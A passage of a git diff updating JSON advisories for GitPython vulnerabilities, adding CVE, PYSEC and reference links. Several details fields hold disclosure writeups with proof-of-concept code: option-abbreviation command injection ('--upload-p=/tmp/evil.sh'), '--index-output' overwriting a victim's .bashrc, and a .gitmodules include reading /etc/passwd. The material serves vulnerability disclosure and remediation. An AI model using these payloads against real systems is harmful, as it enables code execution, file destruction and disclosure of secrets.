os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-73619.json b/advisories/BREW-fdroidserver-CVE-2026-73619.json index 0489085b953..39bb7be2c59 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73619.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73619", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73620.json b/advisories/BREW-fdroidserver-CVE-2026-73620.json index 06a0befae48..34bc027b1be 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73620.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73620", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73621.json b/advisories/BREW-fdroidserver-CVE-2026-73621.json index b64cc111896..54df2e12e88 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73621.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73621", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73622.json b/advisories/BREW-fdroidserver-CVE-2026-73622.json index 0b8d0c541a1..7af9b0f2487 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73622.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73622", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73623.json b/advisories/BREW-fdroidserver-CVE-2026-73623.json index 295687b740c..2987f79abd4 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73623.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73623", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73625.json b/advisories/BREW-fdroidserver-CVE-2026-73625.json index b992b592ab1..8a3882e915b 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73625.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73625", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-76217.json b/advisories/BREW-fdroidserver-CVE-2026-76217.json index bdf71bcfc7d..e8b26b30305 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76217.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76217", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76218.json b/advisories/BREW-fdroidserver-CVE-2026-76218.json index eb600ae0069..308c9b27efa 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76218.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76218", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76219.json b/advisories/BREW-fdroidserver-CVE-2026-76219.json index fb73d2ec8ff..1305b0ee559 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76219.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76219", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76220.json b/advisories/BREW-fdroidserver-CVE-2026-76220.json index 0ceef75482a..b6eca9aec71 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76220.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76220", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76221.json b/advisories/BREW-fdroidserver-CVE-2026-76221.json index a47b0aad7df..3f6105ff79f 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76221.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76221", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-76222.json b/advisories/BREW-fdroidserver-CVE-2026-76222.json index c03d0207f33..f3168eb1e42 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76222.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76222", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78675.json b/advisories/BREW-fdroidserver-CVE-2026-78675.json index d79d970ce1e..883ccae1da1 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78675.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78675", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", 